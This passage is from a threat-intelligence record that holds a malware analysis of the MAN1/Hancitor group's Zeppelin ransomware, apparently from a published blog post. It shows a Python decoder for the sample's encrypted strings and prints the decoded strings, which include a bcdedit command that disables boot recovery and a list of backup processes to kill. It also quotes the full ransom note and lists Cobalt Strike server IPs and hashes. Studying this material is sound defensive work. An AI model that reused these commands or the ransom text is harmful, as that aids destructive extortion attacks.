len(t)\r\n268\r\n\u003e\u003e\u003e def decode(blah):\r\n... rc4 = ARC4.new(blah[:0x20])\r\n... return rc4.decrypt(blah[0x20:])\r\n...\r\n\u003e\u003e\u003e import struct\r\n\u003e\u003e\u003e for val in t:\r\n... o = data.find(val)\r\n... (a,b) = struct.unpack_from('\u003cII', data[o:])\r\n... blob = data[o+8:o+8+b]\r\n... try:\r\n... print(decode(blob))\r\n... except:\r\n... pass\r\n...\r\nA snippet of the decoded strings:\r\nSoftware\\Zeppelin\\Process\r\nSoftware\\Zeppelin\\Process\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\nSoftware\\Zeppelin\r\n\u003c/div\u003e\r\nNtQuerySystemInformation\r\nNtQuerySystemInformation\r\n\u003c/N\u003e\u003cD\u003e\r\n1767974731E6E223476E65712463554E87F55542B120AB1CE64651031B43D6AF4DECB1CF8ED6E71FED2376C3169F7A33AC239\r\n1767974731E6E223476E65712463554E87F55542B120AB1CE64651031B43D6AF4DECB1CF8ED6E71FED2376C3169F7A33AC239\r\n{15F7DAB8-8C18-A41B-BFCD-C970AE422622}\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures;bcdedit /set {default} recoveryenabled no;w\r\n\u003c/N\u003e\u003cD\u003e\r\nboot.ini;bootfont.bin;bootsect.bak;desktop.ini;iconcache.db;ntdetect.com;ntldr;ntuser.dat;ntuser.dat\r\n:\\$Windows.~bt\\;:\\System Volume Information\\;:\\Windows.old\\;:\\Windows\\;:\\intel\\;:\\nvidia\\;:\\inetpub\\l\r\nQueryFullProcessImageNameW\r\nVeeam.Backup.Manager.exe;Veeam.Backup.Agent.ConfigurationService.exe;Veeam.Backup.BrokerService.exe;V\r\n.bat;.cmd;.com;.cpl;.dll;.msc;.msp;.pif;.scr;.sys;.log;.lnk;.zeppelin;\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 17 of 20\n\n!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT\r\n!!! ALL YOUR FILES ARE ENCRYPTED !!!\r\nAll your files, documents, photos, databases and other important files are encrypted.\r\n!!! YOUR FILES ARE ENCRYPTED !!!\r\nAll your files, documents, photos, databases and other important\r\nfiles are encrypted.\r\nYou are not able to decrypt it by yourself! There is only one method\r\nof recovering files it is purchase an unique private key.\r\nWrite to angry_war@protonmail.ch\r\nYour personal ID: \u003c!--ID--\u003e\r\nAttention!\r\n * Do not rename encrypted files.\r\n * Do not try to decrypt your data using third party software, it may cause permanent data loss.\r\nWe can continue pivoting on some of the CobaltStrike C2 servers, their admin ports are 43890 instead of the\r\ndefault 50050 and the cert is static:\r\ns:C = US, ST = Washington, L = Redmond, O = Microsoft Corporation, OU = Microsoft Corporation, CN = O\r\nI wrote up a tool for cert scanning ranges a number of years ago for a local conference and we can use it here to\r\nscan entire ranges looking for this actors infrastructure.\r\n4a08189c6f97c3b9a424f1f18c5c4356beaf1b3e\r\nIP: 31.44.184.181 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporati\r\nIP: 31.44.184.165 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporati\r\nIP: 31.44.184.84 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporatio\r\nIP: 31.44.184.100 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporati\r\nIP: 31.44.184.74 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporatio\r\nIP: 31.44.184.82 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporatio\r\nIP: 31.44.184.174 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporati\r\nIP: 31.44.184.56 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporatio\r\nIP: 31.44.184.73 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporatio\r\nIP: 31.44.184.63 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporatio\r\nAnother range:\r\n4a08189c6f97c3b9a424f1f18c5c4356beaf1b3e\r\nIP: 185.153.199.162 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corpora\r\nIP: 185.153.199.161 - Empty733716db5a44d79a1a2881109f62060079b5b7a0\r\nIP: 185.153.199.167 - Empty21338c5fec99e8df6573b169fbb2f388b84f82ef\r\nIP: 185.153.199.165 - Empty4a08189c6f97c3b9a424f1f18c5c4356beaf1b3e\r\nIP: 185.153.199.163 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corpora\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 18 of 20\n\nIP: 185.153.199.166 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corpora\r\nIP: 185.153.199.164 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corpora\r\nThe ‘Empty’ ones are the default CS admin certification:\r\nsubject=C = Earth, ST = Cyberspace, L = Somewhere, O = cobaltstrike, OU = AdvancedPenTesting, CN = Ma\r\nMore pivoting on one of the CS servers ‘31.44.184.63’ has an interesting file associated with it on VirusTotal.\r\nfe7d4cb5112f5ae0a3d0f9593e1954c60f771f14cc161acd9bdf2f91f2d3267a\r\nThis file is a packed sample of Send-Safe spam bot.\r\n{'C2': '31.44.184.63:50001/50002', 'CONF': '31.44.184.63:50001/50002;Enterprise Mailing Service'}\r\nSend-Safe spammer is also a known utility used by this threat group.\r\nIOCs\r\nCS Related Hashes:\r\n655346f41c456cefd9d40c1b9484f1c0dfa36d180c72dd2d1ada26661be1ca6d\r\n2d038b20eaf05bb8d673542f1dbab6a376abb05bf10d38b04f163cfd6c2a7252\r\ne2f686f17b73398d949998e46c7fde48d0507b324a811df39cdd91531deb3d89\r\nd08131d236658401c8de489596ee83992058f05176cbd8b72add89fcea57e37c\r\nbd3c278309e4fe19f7b424ee0b56a1a2c0bbae3a59882d5b6f171d3ca89f728b\r\nIPs:\r\n31.44.184.181\r\n31.44.184.165\r\n31.44.184.84\r\n31.44.184.100\r\n31.44.184.74\r\n31.44.184.82\r\n31.44.184.174\r\n31.44.184.56\r\n31.44.184.73\r\n31.44.184.63\r\n185.153.199.162\r\n185.153.199.161\r\n185.153.199.167\r\n185.153.199.165\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 19 of 20\n\n185.153.199.163\r\n185.153.199.166\r\n185.153.199.164\r\nReferences\r\nhttps://vixra.org/abs/1902.0257\r\nhttps://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf\r\nhttps://www.proofpoint.com/sites/default/files/pfpt-us-tr-q117-threat-report.pdf\r\nhttps://isc.sans.edu/forums/diary/Hancitor+infection+with+Pony+Evil+Pony+Ursnif+and+Cobalt+Strike/25532/\r\nhttps://app.any.run/tasks/5d21ab13-70fb-4ccf-8a80-545d19c7d20f/\r\nhttps://www.malware-traffic-analysis.net/2020/10/20/index.html\r\nhttps://www.malware-traffic-analysis.net/2020/01/21/index2.html\r\nhttps://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf\r\nSource: https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "origins": [ "web" ], "references": [ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618" ], "report_names": [ "man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "1f6ae238-765f-4495-9d54-6a7883d7a319", "created_at": "2022-10-25T16:07:24.573456Z", "updated_at": "2026-04-10T02:00:05.037738Z", "deleted_at": null, "main_name": "TA511", "aliases": [ "MAN1", "Moskalvzapoe" ], "source_name": "ETDA:TA511", "tools": [ "Agentemis", "Chanitor", "Cobalt Strike", "CobaltStrike", "Ficker Stealer", "Hancitor", "NetSupport", "NetSupport Manager", "NetSupport Manager RAT", "NetSupport RAT", "NetSupportManager RAT", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "542cf9d0-9c68-428c-aff8-81b6f59dc985", "created_at": "2023-02-15T02:01:49.554105Z", "updated_at": "2026-04-10T02:00:03.347115Z", "deleted_at": null, "main_name": "Moskalvzapoe", "aliases": [ "MAN1", "TA511" ], "source_name": "MISPGALAXY:Moskalvzapoe", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434496, "ts_updated_at": 1775826761, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/147179dfe5390b66c89e93060c3c28ea1fac658b.pdf", "text": "https://archive.orkl.eu/147179dfe5390b66c89e93060c3c28ea1fac658b.txt", "img": "https://archive.orkl.eu/147179dfe5390b66c89e93060c3c28ea1fac658b.jpg" } }